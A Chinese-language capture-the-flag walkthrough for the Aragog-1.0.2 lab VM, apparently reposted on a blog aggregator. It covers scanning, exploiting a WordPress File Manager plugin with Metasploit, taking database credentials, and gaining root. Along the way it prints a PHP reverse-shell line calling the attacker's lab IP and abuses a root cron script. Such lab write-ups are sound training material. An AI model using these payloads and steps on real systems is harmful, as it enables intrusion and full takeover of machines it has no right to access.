HarryPotter第一部—Aragog-1.0.2
Aragog 是 3 HarryPotter VM 系列中的第一個 VM,您需要在其中找到隱藏在機器內的 2 個魂器(哈利波特系列的 3 個 VM 中總共隱藏了 8 個魂器)并最終擊敗 Voldemort。
信息收集
nmap掃描
nmap -sC -sV 192.168.210.148
IP地址靶機登錄界面已經給出 根據掃描結果可得22ssh ,80http
?
網站信息收集
只有一張圖片
爆破一下網站目錄
?
dirb http://192.168.210.148
爆出來一個blog
頁面有點奇怪,點擊頁面都會錯誤,推測需要域名解析,去/etc/hosts中寫一下域名解析
哎,這就好了嘛
既然cms為wordpress那么必須得用wpscan跑一跑
直接掃沒掃出什么有效信息,版本沒有問題那可能插件有漏洞(noitce中提示),嘗試wpscan注冊賬號,帶上 api-token 跑一跑
?
注冊wpscan一個賬號 https://wpvulndb.com/users/sign_up
wpscan --api-token=免費版的就行 --url=http://192.168.210.148/blog -e p --plugins-detection aggressive
掃出3個問題,全是File Manager的漏洞
漏洞利用
msf getshell
msf檢索漏洞exp
調試好參數
search wordpress File Manager
use 1
set rhosts wordpress.aragog.hogwarts
set targeturi /blog
set lhost 192.168.210.40
run
?
在/etc/wordpress/config-default.php 中發現了數據庫的用戶名密碼
python調bash
python3 -c 'import pty; pty.spawn("/bin/bash");'
?
登錄mysql數據庫
查詢數據庫信息
得到用戶hagrid98 PPPBYdTic1NGSb8hJbpVEMiJaAiNJDHtc.
界面后可得 密碼為password123
ssh登錄
成功拿到第一個魂器
提權
在/opt下發現一個隱藏腳本,可以拷貝文件
?
在tmp下創建php反彈shell馬
<?php $sock=fsockopen("192.168.210.40",9999);exec("/bin/sh -i <&3 >&3 2>&3"); ?>?>
?
?
將腳本添加兩行
kali建通端口,等待不超過1分鐘
成功獲得root權限
家目錄下拿到第二個魂器
能彈shell的原因是root有一個計劃任務
總結
以上是生活随笔為你收集整理的HarryPotter第一部—Aragog-1.0.2的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 阿凡達觀後感
- 下一篇: 免费下载 [discuz!插件] 404